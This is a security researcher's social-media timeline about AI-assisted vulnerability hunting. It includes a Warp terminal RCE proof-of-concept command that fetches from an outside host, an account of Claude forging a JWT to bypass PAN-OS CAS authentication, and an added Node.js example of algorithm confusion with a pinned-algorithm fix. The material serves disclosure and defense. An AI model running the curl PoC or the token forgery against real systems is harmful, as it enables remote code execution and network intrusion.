Harsh Jaiswal retweeted
TUIs getting stronger only means they’re also making it fun to hack. @warpdotdev terminal RCE by @rootxharsh and @HacktronAI PoC: run this in warp terminal and get pwned. curl htxp://rce.ee/warp-pwn.php Details below:
RCE in Warp Terminal! I believe the attack surface is broadening with every new tool you use. Every OAuth app you authorise with elevated scopes.. we'd see more breaches via targeting tools/SaaS.. the attack surface is everyone and everything now - hacktron.ai/blog/the-attack-…
Harsh Jaiswal retweeted
Replying to @S1r1u5_
Really hope more people get to try Hacktron. You guys are doing great so far and I love the open source initiative
Harsh Jaiswal retweeted
won't say it's perfect yet, still a lot to improve in terms of reducing false positives, but so far good response. if you have open source project, we review for free, apply here: hacktron.ai/open-source if not, try the free trial
Lol sure.
Harsh Jaiswal retweeted
So @Doyensec recently published a report comparing @xbow and @AikidoSecurity, two AI pentest platforms. I figured, why not run @HacktronAI on the same test? So I ran a pentest on one of the targets. Hacktron cost $350, while XBOW and Aikido cost $4,000 each. We did pretty well!
Harsh Jaiswal retweeted
Introducing Hacktron Whitebox: get white-box security assessments with audit-ready reports without waiting on a traditional pentest cycle. AI has roughly tripled the rate of code shipped in the past year. But penetration testing has not kept pace, often taking weeks to months.
Models tend to set up very bruteforce-able passwords in most cases. Related to company name, year, task, context, etc. Golden era for credential brute-force attacks in the coming months.
Harsh Jaiswal retweeted
it's a great feeling to see the thing you worked on for over a year start creating value
Can Mythos find React2Shell and exploit it?
Last year, on a vacation, @S1r1u5_ and I were discussing the human need for validation and how most things we do can be tied to it, consciously or subconsciously. Mohan asked, Would you still be doing what you do (hacking, publishing blogs, competing, etc.) if no one was there to see it? At that time, my answer was "yeah, probably?" Today, the world has somewhat come to that. All the things you thought gave you validation are now norms. Things you once took pride in can be replicated in a few prompts. I mean, people are dropping 0days every day now, and there's an unlikely chance of your blog getting reads so there goes that validation. So would you still do it on your own? For your own sake and sanity? My answer is a confident yes now. In the last couple of months, I've seen models find bugs autonomously or sometimes with just a bit of a hunch from me, but sharing these bugs publicly hasn't been rewarding. And not in the sense of likes or reach alone, I've just been less motivated overall. I have a few blogs sitting in my queue, and what I'm noticing is I keep procrastinating, because there's not much authenticity to my own work in them, and I don't have the enthusiasm to share the same story again, how the model found this and that. I think if you really love the game, sooner or later, you have to come to terms with the fact that to stay sane, you need to go back to that problem-solving phase, otherwise it gets pretty depressing. As much as I love watching LLMs find bugs, it feels soulless at times.. all this is a signal to me that I can't function like this in the long run. It makes me feel dopamine-deprived, and I need to be hacking shit on my own.. Now, when I say "on my own", I don't mean no AI, AI bad. No, not at all.. There's a big difference between using an LLM as an accelerator in your work vs delegating your understanding to it.
From a long-term pov, the former is the only path imo, and even then, the mind map you build on your own is very different from the one you'd end up with leaning on LLMs. The dopamine hit isn't even close to figuring shit out on your own. Seeing how AI is making 0days the norm and CTFs no longer the same.. The question is more real now than ever. Would you still sit down and hack stuff even when no one's watching, knowing people might be on top of the leaderboard via AI, just for the love for the game?
When Your VPN Opens Your Private Network to the Public! An auth bypass in Palo Alto PAN-OS CAS Auth (CVE-2026-0265) that lets an attacker connect to the company's GlobalProtect VPN. Blog - hacktron.ai/blog/cve-2026-02…
I pointed Claude to start diving into the CAS implementation in the shared libraries, and in just a few minutes, it had found a textbook JWT algorithm confusion. The verification function trusts the alg header from the JWT itself. Switch RS256 to HS256, and the public signing certificate becomes the HMAC secret key. I couldn't believe it at first, this in 2026??
After configuring CAS on my instance, and trust me, this was the toughest part of the journey. Once done, Claude forged a JWT, POSTs it to /SAML20/SP/ACS, and gets a session cookie/tokens which can be used to connect to the VPN. It was game over. Your private network was public. If you're running CAS-enabled PAN-OS, update the appliance immediately.
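The flaw pattern described in the thread above (a verifier that lets the token's own `alg` header choose the algorithm) next to a verifier that pins the algorithm, as an added example that is not part of the original posts and is not PAN-OS code. The key pair, claims and all function names are constructed for illustration.

```javascript
const crypto = require('crypto');

// Constructed key pair standing in for an identity provider's signing key.
const { publicKey, privateKey } = crypto.generateKeyPairSync('rsa', { modulusLength: 2048 });
const PUBLIC_PEM = publicKey.export({ type: 'spki', format: 'pem' });
const EXPECTED_ALG = 'RS256'; // fixed by configuration, never read from the token

const b64u = (x) => Buffer.from(x).toString('base64url');

// Builds a compact JWS; `key` is a private key for RS256 or an HMAC secret for HS256.
function sign(alg, claims, key) {
  const input = `${b64u(JSON.stringify({ alg, typ: 'JWT' }))}.${b64u(JSON.stringify(claims))}`;
  const sig = alg === 'RS256'
    ? crypto.sign('sha256', Buffer.from(input), key)
    : crypto.createHmac('sha256', key).update(input).digest();
  return `${input}.${sig.toString('base64url')}`;
}

function parse(token) {
  const parts = token.split('.');
  if (parts.length !== 3) throw new Error('malformed token');
  const header = JSON.parse(Buffer.from(parts[0], 'base64url').toString('utf8'));
  return { header, input: `${parts[0]}.${parts[1]}`, sig: Buffer.from(parts[2], 'base64url') };
}

// Flawed pattern: the header picks the algorithm, so the public PEM that was
// configured for RS256 is also accepted as an HS256 shared secret.
function verifyTrustingHeader(token, pem) {
  const { header, input, sig } = parse(token);
  if (header.alg === 'HS256') {
    const mac = crypto.createHmac('sha256', pem).update(input).digest();
    return mac.length === sig.length && crypto.timingSafeEqual(mac, sig);
  }
  return header.alg === 'RS256' && crypto.verify('sha256', Buffer.from(input), pem, sig);
}

// Hardened: reject any header that disagrees with the configured algorithm
// before touching key material, then verify with that algorithm only.
function verifyPinned(token, pem) {
  const { header, input, sig } = parse(token);
  if (header.alg !== EXPECTED_ALG) return false;
  return crypto.verify('sha256', Buffer.from(input), pem, sig);
}

// Constructed test tokens: one signed properly, one MACed with the public PEM.
const genuine = sign('RS256', { sub: 'alice' }, privateKey);
const confused = sign('HS256', { sub: 'alice' }, PUBLIC_PEM);
```

When reviewing a verifier, the thing to look for is any code path where the key type or algorithm is selected from attacker-controlled header fields rather than from configuration.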